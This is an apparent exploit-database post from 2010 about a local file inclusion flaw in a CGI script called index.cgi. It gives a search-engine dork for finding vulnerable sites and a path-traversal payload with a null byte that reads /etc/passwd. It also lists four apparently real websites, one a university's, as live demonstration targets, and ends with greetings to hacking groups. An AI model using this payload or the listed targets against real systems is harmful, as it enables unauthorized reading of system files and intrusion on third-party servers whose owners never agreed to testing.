id: 14355
date: 10/05/2010
title: Conversation for Exploration (Index.cgi) LFI Vulnerability
author: Net.Edit0r
cves: 

==========================================================
Conversation for Exploration (Index.cgi) LFI Vulnerability
==========================================================

###########################

Author: Net.Edit0r

Email : Net.Edit0r@att.net & Black.hat.tm@gmail.com

Script: Script Home [ www.lauralee.com ]

Dork : "Conversation for Exploration with LAURA LEE"

Platform :linux/cgi

###########################

[ Vulnerable File ]

1. [ index.cgi?page=../../../../../../../../../../etc/passwd%00 ]

[ XpL ]

http://Target/[path]/index.cgi?page=../../../../../../../../../../etc/passwd%00


[ Demo]

http://www.shamanicvision.com/index.cgi?page=../../../../../../../../../../etc/passwd%00

http://www.talkstudio.com/index.cgi?page=../../../../../../../../../../etc/passwd%00

http://www.globalelders.com/index.cgi?page=../../../../../../../../../../etc/passwd%00

http://www.arch.waseda.ac.jp/index.cgi?page=../../../../../../../../../../etc/passwd%00

########################################### Iranian HackerZ
##############################################
#
#
# Thanks To: Darkcoder ~ H-SK33PY ~ S3Ri0uS ~ b3hz4d ~ Classic ~
AmIr-MaGic ~ Skitt3r ~ J3nN3.B4m4r4M
#
#
# Greetz : Ashiyane.Org ~ Datacoders.Org ~ Houseofhackers.Net ~ PHC.Ir #Ibh
#
##########################################################################################################



#  0day.today [2023-03-25]  #